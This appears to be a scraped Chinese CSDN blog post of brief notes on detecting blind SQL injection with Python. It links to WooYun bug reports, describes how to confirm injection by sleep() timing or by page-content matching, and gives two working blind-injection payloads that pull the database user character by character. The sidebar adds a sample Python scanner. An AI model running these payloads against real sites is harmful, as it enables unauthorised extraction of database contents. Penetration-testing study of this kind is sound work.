python检测SQL注入的相关代码(参考lijiejie)

最新推荐文章于 2024-05-08 21:24:58 发布
最新推荐文章于 2024-05-08 21:24:58 发布
阅读量2.2k 收藏
点赞数
分类专栏: python相关代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p656456564545/article/details/42405631
版权

mysql:

   post注入相关http://www.wooyun.org/bugs/wooyun-2010-082219

  

mssql:

  http://www.wooyun.org/bugs/wooyun-2010-081815

oracle:

    http://www.wooyun.org/bugs/wooyun-2010-082564



关于不同的返回来判定的方式:

1:根据sleep()来看是否timeout 

2:根据页面返回值匹配正则表达式

eg: http://www.wooyun.org/bugs/wooyun-2010-083715

if html_doc.find(u"_zpq.push(['_setParams','','xa','城北','','']);") > 0:


常用的payload方式:

String类型:

111'XOR(if(ascii(mid(lower(user()),%s,1))=%s,sleep(3),0))OR'bbb

url = "/community/W0QQp1Z3724' AND ascii(mid(user()from(%s)for(1)))=%s AND 'aaa'='aaa" % (i, ord(payload))




爬虫仔蛙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全渗透测试十大常规项(一):web渗透测试之ASP环境和ACCESS注入
HACKONE的博客
06-16 36
安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本。Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2。如:logo.asp;后台路径获取,数据库文件获取,其他敏感文件获取等。
Python实现SQL注入检测插件实例代码
01-21
首先需要开发一个爬虫用于收集网站的链接,爬虫需要记录已经爬取的链接和待爬取的链接,并且去重,用 Python 的set()就可以解决,大概流程是: 输入 URL 下载解析出 URL URL 去重,判断是否为本站 加入到待爬...
Bugku SQL注入2
小白渣的博客
09-18 804
这道题目属实有点牛逼 1.直接 即可得到 flag 2.这加粗样式道题属于典型的DS_Store源码泄露,当然还有其他类型(常见web源码泄露总结)(常见的web源码泄露总结). 结果用御剑和bp爆口令好像都无果 ...
Python 开发 框架安全:Django SQL注入漏洞测试.(CVE-2021-35042)
最新发布
网络安全领域___专研者.
05-08 889
Django 是一个Python 编写的 Web 应用程序框架。它提供了许多工具和库,使得开发 Web 应用程序变得更加容易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分离开来,使得开发人员可以更加专注于应用程序的不同方面。
Python渗透测试工具库
w1304099880的博客
06-01 1892
漏洞及渗透练习平台 WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill vulapps漏洞练习平台: https://...
客户现场的一次PostgreSQL注入
qq_44133136的博客
03-22 733
一次现场的postgresql注入,导致所有的用户无法登录系统,然后到还原的经历。
Bugku-CTF之sql注入2 (全都tm过滤了绝望吗?)
weixin_30593443的博客
07-04 1185
Day 38 sql注入2 200 http://123.206.87.240:8007/web2/ 全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,% ​ 本题要点:DS_Store源码泄露 用bp弱口令爆一波 没有结果~ 用御剑扫描后台 ...
WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏
siu~
08-31 218
1、ASP-SQL注入-Access数据库(一般都是小型网站用的多,现在比较少见) 2、ASP-默认安装-数据库泄漏下载 3、ASP-IIS-CVE&短文件&解析&写入
命令注入和一个分享
dfdhxb995397的博客
09-04 195
本文作者:i春秋签约作家——夏之冰雪 系统命令注入是常见的一类漏洞,攻击者可以绕过业务本身,在服务器上执行一个或多个系统命令。 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区别在于,远程代码执行实际上是调用服务器网站代码进行执行,而命令注入则是调用操作系统命令进行执行。 虽然最终效果都会在目标机器执行操,但是他们还是有区别的,基于这个区别,我们如何找到并...
便携式三星mysql_三星集团某站点MySQL盲注一枚(附python验证脚本)
weixin_39595271的博客
02-05 51
漏洞概要缺陷编号:WooYun-2014-082219漏洞标题:三星集团某站点MySQL盲注一枚(附python验证脚本)相关厂商:三星集团漏洞作者:lijiejie提交时间:2014-11-06 10:55公开时间:2014-12-21 11:02漏洞类型:SQL注射漏洞危害等级:高自评Rank:10漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2014-11-06: 积...
渗透测试工具大全
qq_42452450的博客
04-07 1115
https://github.com/We5ter/Scanners-Box/tree/master/Find_webshell/ (php后门检测,脚本较简单,因此存在误报高和效率低下的问题)以下内容来自:https://github.com/We5ter/Scanners-Box/blob/master/README_CN.md 子域名枚举类。https://github.com/3xp10it/mytools/blob/master/xcdn.py(获取cdn背后的真实ip)
使用Python防止SQL注入攻击的实现示例
09-16
主要介绍了使用Python防止SQL注入攻击的实现示例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
基于Python的机器学习检测SQL注入.zip
03-03
基于Python的机器学习检测SQL注入.zip 本项目是使用机器学习算法来分类SQL注入语句与正常语句: 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。 ...
Python中防止sql注入的方法详解
09-21
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无...下面这篇文章主要给大家介绍了关于Python中防止sql注入的方法,需要的朋友可以参考下。
一个很好的python代理脚本(给sqlmapapi发送请求的玩意),函数可以参考拿着用呗
p656456564545的专栏
08-18 2411
req2sqlmap.py   #encoding=utf-8 import urllib import urllib2 import re import  json from urlparse import urlparse   #每一个分布式客户端需要又一个唯一的clientid,否则会引起冲突 #如果重启代理,相当于添加一个新的client,因此也需要更换clientid ClintId="
python常见错误
p656456564545的专栏
04-05 1719
一、常见难点 索引: 字符串方法的灵活使用 字符串格式化 Unicode 字符 Python乱码问题 字符串与列表转换问题 列表类型内建函数灵活应用 二、逐一击破 1、字符串方法的灵活使用 Python字符串内建方法在《Python核心编程》列举的很全面,这里不再累述,就总结以下常用的。 (1)、string.capital
google-hack相关python脚本
p656456564545的专栏
05-07 1269
import  urllib2,urllib import  simplejson import  json import  random searchstr='inurl:.action+filetype:action+' def random_useragent(): USER_AGENTS = [ "Mozilla/4.0 (compatible; MSIE 6
常见渗透py脚本
p656456564545的专栏
03-09 784
http://p6.qhimg.com/t0170ec7638e15c209c.jpg
python实现sql注入检测插件实例代码
05-13
Python是一种功能强大、易于学习的编程语言,可以轻松实现SQL注入检测插件。下面是一个简单的示例代码: ``` import re import requests def sql_test(url): payload = "'" headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'} r = requests.get(url + payload, headers=headers) regex = re.compile(r"You have an error in your SQL syntax") result = regex.search(r.text) if result: print(url + " is vulnerable to SQL Injection!") else: print(url + " is not vulnerable to SQL Injection!") if __name__ == '__main__': sql_test('https://example.com/page.php?id=1') ``` 这个函数首先构造了一个SQL注入payload,然后发送带有payload的GET请求。接着,函数使用正则表达式来查找是否存在SQL注入错误。如果找到了该错误,则认为该URL存在SQL注入漏洞;否则,认为该URL不存在SQL注入漏洞。 需要注意的是,该代码只是一个示例,实际使用中无法检测所有类型的SQL注入攻击。因此,开发人员需要仔细评估和测试插件的可靠性和准确性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值